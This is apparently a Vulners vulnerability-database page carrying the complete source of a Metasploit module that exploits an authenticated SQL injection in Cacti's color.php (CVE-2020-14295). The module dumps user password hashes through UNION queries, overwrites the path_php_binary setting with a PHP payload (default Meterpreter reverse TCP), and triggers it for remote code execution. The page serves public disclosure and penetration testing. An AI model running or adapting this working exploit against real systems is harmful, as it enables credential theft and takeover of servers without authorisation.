Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cacti color filter authenticated SQLi to RCE

🗓️ 01 Jun 2021 17:42:05Reported by h00die, Leonardo Paiva, Mayfly277Type 
metasploit
 metasploit🔗 www.rapid7.com👁 93 Views

Cacti color filter SQLi to RCE exploi

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for SQL Injection in Cacti
28 May 202116:40
githubexploit
GithubExploit		Exploit for SQL Injection in Cacti
28 Apr 202120:57
githubexploit
0day.today		Cacti 1.2.12 - (filter) SQL Injection / Remote Code Execution Exploit
29 Apr 202100:00
zdt
0day.today		Cacti 1.2.12 SQL Injection / Remote Command Execution Exploit
2 Jun 202100:00
zdt
ATTACKERKB		CVE-2020-14295
17 Jun 202000:00
attackerkb
AlpineLinux		CVE-2020-14295
17 Jun 202013:47
alpinelinux
FreeBSD		Cacti -- multiple vulnerabilities
15 Jul 202000:00
freebsd
Circl		CVE-2020-14295
30 Apr 202102:55
circl
CNVD		Cacti1 SQL Injection Vulnerability
18 Jun 202000:00
cnvd
Check Point Advisories		Cacti color.php SQL Injection (CVE-2020-14295)
21 Sep 202000:00
checkpoint_advisories
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cacti color filter authenticated SQLi to RCE',
        'Description' => %q{
          This module exploits a SQL injection vulnerability in Cacti 1.2.12 and before. An admin can exploit the filter
          variable within color.php to pull arbitrary values as well as conduct stacked queries. With stacked queries, the
          path_php_binary value is changed within the settings table to a payload, and an update is called to execute the payload.
          After calling the payload, the value is reset.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Leonardo Paiva', # edb, RCE
          'Mayfly277' # original github, M4yFly on twitter SQLi
        ],
        'References' => [
          [ 'EDB', '49810' ],
          [ 'URL', 'https://github.com/Cacti/cacti/issues/3622' ],
          [ 'CVE', '2020-14295' ]
        ],
        'Privileged' => false,
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp' },
        'Payload' => {
          'BadChars' => "\x22\x27" # " '
        },
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ CONFIG_CHANGES, IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DisclosureDate' => '2020-06-17',
        'DefaultTarget' => 0
      )
    )
    register_options(
      [
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
        OptString.new('TARGETURI', [ true, 'The URI of Cacti', '/cacti/']),
        OptBool.new('CREDS', [ false, 'Dump cacti creds', true])
      ]
    )
  end

  def check
    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'method' => 'GET'
      )
      return CheckCode::Safe("#{peer} - Could not connect to web service - no response") if res.nil?
      return CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

      # cacti gives us the version in a JS variable
      /var cactiVersion='(?<version>\d{1,2}\.\d{1,2}\.\d{1,2})'/ =~ res.body

      if version && Rex::Version.new(version) <= Rex::Version.new('1.2.12')
        vprint_good("Version Detected: #{version}")
        return CheckCode::Appears
      end
    rescue ::Rex::ConnectionError
      CheckCode::Safe("#{peer} - Could not connect to the web service") # unknown maybe?
    end
    CheckCode::Safe("Cacti #{version} is not a vulnerable version.")
  end

  def exploit
    login

    # optionally grab the un/pass fields for all users.  While we're already admin, cred stuffing...
    if datastore['CREDS']
      # https://user-images.githubusercontent.com/23179648/84865521-a213eb80-b078-11ea-985f-f994d3409c72.png
      print_status('Dumping creds')
      res = inject("')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;")
      return unless res
      return if res.nil?
      return if res.body.nil?

      res.body.split.each do |cred|
        /"(?<username>[^"]+)","(?<hash>[^"]+)"/ =~ cred
        next unless hash
        next if hash == 'hex' # header row

        print_good("Username: #{username}, Password Hash: #{hash}")
        report_cred(
          username: username,
          password: hash,
          private_type: :nonreplayable_hash
        )
      end
    end

    print_status('Backing-up path_php_binary value')
    res = inject("')+UNION+SELECT+1,value,3,4,5,6,7+from+settings+where+name='path_php_binary';")

    # return value:
    # "name","hex"
    # "","FEFCFF"
    # "/usr/bin/php","3"
    if res && !res.body.nil?
      php_binary = res.body.split.last # check to make sure we have something first before proceeding
      fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") if php_binary.nil?
      php_binary = php_binary.split(',')[0].gsub('"', '') # take last entry on page, and split to value
    end
    fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") unless php_binary
    print_good("path_php_binary: #{php_binary}")

    print_status('Uploading payload')
    begin
      pload = "#{php_binary} -r '#{payload.encoded}' #"
      pload = Rex::Text.uri_encode(pload.gsub("'", "\\\\'"))
      inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{pload}'+where+name='path_php_binary';")
      print_good('Executing Payload')
      trigger
    ensure
      resetsqli(php_binary)
    end
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end

  def login
    cookie_jar.clear

    print_status('Grabbing CSRF')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'keep_cookies' => true
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    /name='__csrf_magic' value="(?<csrf>[^"]+)"/ =~ res.body
    fail_with(Failure::NotFound, 'Unable to find CSRF token') unless csrf

    print_good("CSRF: #{csrf}")

    print_status('Attempting login')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_post' => {
        'login_username' => datastore['USERNAME'],
        'login_password' => datastore['PASSWORD'],
        'action' => 'login',
        '__csrf_magic' => csrf
      }
    )

    if res && res.code != 302
      fail_with(Failure::NoAccess, "#{peer} - Invalid credentials (response code: #{res.code})")
    end

    res
  end

  def inject(content)
    res = send_request_cgi(
      'uri' => "#{normalize_uri(target_uri.path, 'color.php')}?action=export&header=false&filter=1#{content}--+-",
      'keep_cookies' => true
    )

    if res && res.code != 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Injection Failed (response code: #{res.code})")
    end
    res
  end

  def trigger
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'host.php'),
      'keep_cookies' => true,
      'vars_get' => {
        'action' => 'reindex'
      }
    )
  end

  def resetsqli(php_binary)
    print_status('Cleaning up environment')
    login # any subsequent requests with our cookie will fail, so we'll need to login a 2nd time to reset the database value correctly
    print_status('Resetting DB Value')
    inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{php_binary}'+where+name='path_php_binary';")
  end

  def report_cred(opts)
    service_data = {
      address: datastore['RHOST'],
      port: datastore['RPORT'],
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }
    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:username],
      private_data: opts[:password],
      private_type: opts[:private_type],
      jtr_format: Metasploit::Framework::Hashes.identify_hash(opts[:password])
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: ''
    }.merge(service_data)
    create_credential_login(login_data)
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Apr 2026 19:01Current
8.6High risk
Vulners AI Score8.6
CVSS 26.5
CVSS 3.17.2
EPSS0.78686
metasploitsql injectioncactiremote code executioncve-2020-14295authenticationphpcredentials extraction
93